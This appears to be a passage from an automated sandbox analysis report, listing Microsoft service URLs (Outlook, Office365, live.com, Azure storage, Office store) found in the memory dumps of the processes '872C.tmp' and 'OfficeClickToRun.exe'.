872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B67000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013710001.00000248C2B5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 
00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/329
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/3297
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395309727.0000000003ECD000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395226390.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/329S
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052379122.00000248C2CF4000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052051790.00000248C2CEB000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052379122.00000248C2CF4000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 
00000006.00000003.2052051790.00000248C2CEB000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059567438.00000248C2CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonD
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonv2
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString 
found in binary or memory: https://outlook.office365.com/connectors
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/connectorsUX494
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/connectorsnit3P--
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/ews/exchange.asmx
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1Fix
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook3
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/review/query
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052051790.00000248C2CEB000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059428637.00000248C2CEF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonathWiO
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsoned
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonMBI_SSL_SHORTssl.
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 
00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8
00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678240491.00000248C314B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1677812892.00000248C3123000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/worke/v1
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.aiBearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1395251376.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://storage.azure.com/
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.office.com/catalog/laststoreupdate-AD4A-41F5A7235243
